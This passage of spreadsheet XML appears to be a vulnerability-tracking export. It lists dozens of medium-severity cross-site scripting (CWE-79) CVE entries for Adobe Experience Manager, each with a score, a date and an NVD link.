      <c r="D4944" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4944" s="5" t="inlineStr"/>
      <c r="F4944" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4944" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4944" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4944" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4944" s="5" t="inlineStr"/>
      <c r="K4944" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L494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44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75700</t>
        </is>
      </c>
    </row>
    <row r="4945">
      <c r="A4945" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75701</t>
        </is>
      </c>
      <c r="C4945" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4945" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4945" s="5" t="inlineStr"/>
      <c r="F4945" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4945" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4945" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4945" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4945" s="5" t="inlineStr"/>
      <c r="K4945" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L494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45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75701</t>
        </is>
      </c>
    </row>
    <row r="4946">
      <c r="A4946" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75702</t>
        </is>
      </c>
      <c r="C4946" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4946" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4946" s="5" t="inlineStr"/>
      <c r="F4946" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4946" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4946" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4946" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4946" s="5" t="inlineStr"/>
      <c r="K4946" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L494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46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75702</t>
        </is>
      </c>
    </row>
    <row r="4947">
      <c r="A4947" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75704</t>
        </is>
      </c>
      <c r="C4947" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4947" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4947" s="5" t="inlineStr"/>
      <c r="F4947" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4947" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4947" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4947" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4947" s="5" t="inlineStr"/>
      <c r="K4947" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L494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47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75704</t>
        </is>
      </c>
    </row>
    <row r="4948">
      <c r="A4948" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75705</t>
        </is>
      </c>
      <c r="C4948" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4948" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4948" s="5" t="inlineStr"/>
      <c r="F4948" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4948" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4948" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4948" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4948" s="5" t="inlineStr"/>
      <c r="K4948" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L494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48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75705</t>
        </is>
      </c>
    </row>
    <row r="4949">
      <c r="A4949" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75706</t>
        </is>
      </c>
      <c r="C4949" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4949" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4949" s="5" t="inlineStr"/>
      <c r="F4949" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4949" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4949" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4949" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4949" s="5" t="inlineStr"/>
      <c r="K4949" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L494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49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75706</t>
        </is>
      </c>
    </row>
    <row r="4950">
      <c r="A4950" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75707</t>
        </is>
      </c>
      <c r="C4950" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4950" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4950" s="5" t="inlineStr"/>
      <c r="F4950" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4950" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4950" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4950" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4950" s="5" t="inlineStr"/>
      <c r="K4950" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L495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50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75707</t>
        </is>
      </c>
    </row>
    <row r="4951">
      <c r="A4951" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75708</t>
        </is>
      </c>
      <c r="C4951" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4951" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4951" s="5" t="inlineStr"/>
      <c r="F4951" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4951" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4951" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4951" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4951" s="5" t="inlineStr"/>
      <c r="K4951" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L495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51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75708</t>
        </is>
      </c>
    </row>
    <row r="4952">
      <c r="A4952" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75709</t>
        </is>
      </c>
      <c r="C4952" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4952" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4952" s="5" t="inlineStr"/>
      <c r="F4952" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4952" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4952" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4952" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4952" s="5" t="inlineStr"/>
      <c r="K4952" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L495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52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75709</t>
        </is>
      </c>
    </row>
    <row r="4953">
      <c r="A4953" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75710</t>
        </is>
      </c>
      <c r="C4953" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4953" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4953" s="5" t="inlineStr"/>
      <c r="F4953" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4953" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4953" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4953" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4953" s="5" t="inlineStr"/>
      <c r="K4953" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L495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53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75710</t>
        </is>
      </c>
    </row>
    <row r="4954">
      <c r="A4954" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75711</t>
        </is>
      </c>
      <c r="C4954" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4954" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4954" s="5" t="inlineStr"/>
      <c r="F4954" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4954" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4954" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4954" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4954" s="5" t="inlineStr"/>
      <c r="K4954" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L495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54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75711</t>
        </is>
      </c>
    </row>
    <row r="4955">
      <c r="A4955" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75712</t>
        </is>
      </c>
      <c r="C4955" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4955" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4955" s="5" t="inlineStr"/>
      <c r="F4955" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4955" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4955" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4955" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4955" s="5" t="inlineStr"/>
      <c r="K4955" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L495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55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75712</t>
        </is>
      </c>
    </row>
    <row r="4956">
      <c r="A4956" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75713</t>
        </is>
      </c>
      <c r="C4956" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4956" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4956" s="5" t="inlineStr"/>
      <c r="F4956" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4956" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4956" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4956" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4956" s="5" t="inlineStr"/>
      <c r="K4956" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L495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56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75713</t>
        </is>
      </c>
    </row>
    <row r="4957">
      <c r="A4957" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75714</t>
        </is>
      </c>
      <c r="C4957" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4957" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4957" s="5" t="inlineStr"/>
      <c r="F4957" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4957" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4957" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4957" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4957" s="5" t="inlineStr"/>
      <c r="K4957" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L495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57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75714</t>
        </is>
      </c>
    </row>
    <row r="4958">
      <c r="A4958" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75715</t>
        </is>
      </c>
      <c r="C4958" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4958" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4958" s="5" t="inlineStr"/>
      <c r="F4958" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4958" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4958" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4958" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4958" s="5" t="inlineStr"/>
      <c r="K4958" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L495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58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75715</t>
        </is>
      </c>
    </row>
    <row r="4959">
      <c r="A4959" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75716</t>
        </is>
      </c>
      <c r="C4959" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4959" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4959" s="5" t="inlineStr"/>
      <c r="F4959" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4959" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4959" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4959" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4959" s="5" t="inlineStr"/>
      <c r="K4959" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L495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59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75716</t>
        </is>
      </c>
    </row>
    <row r="4960">
      <c r="A4960" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75717</t>
        </is>
      </c>
      <c r="C4960" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4960" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4960" s="5" t="inlineStr"/>
      <c r="F4960" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4960" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4960" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4960" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4960" s="5" t="inlineStr"/>
      <c r="K4960" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L496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60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75717</t>
        </is>
      </c>
    </row>
    <row r="4961">
      <c r="A4961" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75718</t>
        </is>
      </c>
      <c r="C4961" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4961" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4961" s="5" t="inlineStr"/>
      <c r="F4961" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4961" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4961" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4961" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4961" s="5" t="inlineStr"/>
      <c r="K4961" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L496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61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75718</t>
        </is>
      </c>
    </row>
    <row r="4962">
      <c r="A4962" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75719</t>
        </is>
      </c>
      <c r="C4962" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4962" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4962" s="5" t="inlineStr"/>
      <c r="F4962" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4962" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4962" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4962" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4962" s="5" t="inlineStr"/>
      <c r="K4962" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L496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62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75719</t>
        </is>
      </c>
    </row>
    <row r="4963">
      <c r="A4963" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75720</t>
        </is>
      </c>
      <c r="C4963" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4963" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4963" s="5" t="inlineStr"/>
      <c r="F4963" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4963" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4963" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4963" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4963" s="5" t="inlineStr"/>
      <c r="K4963" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L496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63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75720</t>
        </is>
      </c>
    </row>
    <row r="4964">
      <c r="A4964" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75722</t>
        </is>
      </c>
      <c r="C4964" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4964" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4964" s="5" t="inlineStr"/>
      <c r="F4964" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4964" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4964" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4964" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4964" s="5" t="inlineStr"/>
      <c r="K4964" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L496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64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75722</t>
        </is>
      </c>
    </row>
    <row r="4965">
      <c r="A4965" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75724</t>
        </is>
      </c>
      <c r="C4965" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4965" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4965" s="5" t="inlineStr"/>
      <c r="F4965" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4965" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4965" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4965" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4965" s="5" t="inlineStr"/>
      <c r="K4965" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L496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65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75724</t>
        </is>
      </c>
    </row>
    <row r="4966">
      <c r="A4966" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75725</t>
        </is>
      </c>
      <c r="C4966" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4966" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4966" s="5" t="inlineStr"/>
      <c r="F4966" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4966" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4966" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4966" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4966" s="5" t="inlineStr"/>
      <c r="K4966" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L496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66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75725</t>
        </is>
      </c>
    </row>
    <row r="4967">
      <c r="A4967" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75727</t>
        </is>
      </c>
      <c r="C4967" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4967" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4967" s="5" t="inlineStr"/>
      <c r="F4967" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4967" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4967" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4967" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4967" s="5" t="inlineStr"/>
      <c r="K4967" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L496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967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75727</t>
        </is>
      </c>
    </row>
    <row r="4968">
      <c r="A4968" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75729</t>
        </is>
      </c>
      <c r="C4968" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4968" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4968" s="5" t="inlineStr"/>
      <c r="F4968" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4968" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4968" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4968" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4968" s="5" t="inlineStr"/>
      <c r="K4968" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L496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968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75729</t>
        </is>
      </c>
    </row>
    <row r="4969">
      <c r="A4969" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75730</t>
        </is>
      </c>
      <c r="C4969" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4969" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4969" s="5" t="inlineStr"/>
      <c r="F4969" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4969" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4969" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4969" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4969" s="5" t="inlineStr"/>
      <c r="K4969" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L496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969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75730</t>
        </is>
      </c>
    </row>
    <row r="4970">
      <c r="A4970" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75731</t>
        </is>
      </c>
      <c r="C4970" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4970" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4970" s="5" t="inlineStr"/>
      <c r="F4970" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4970" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4970" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4970" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4970" s="5" t="inlineStr"/>
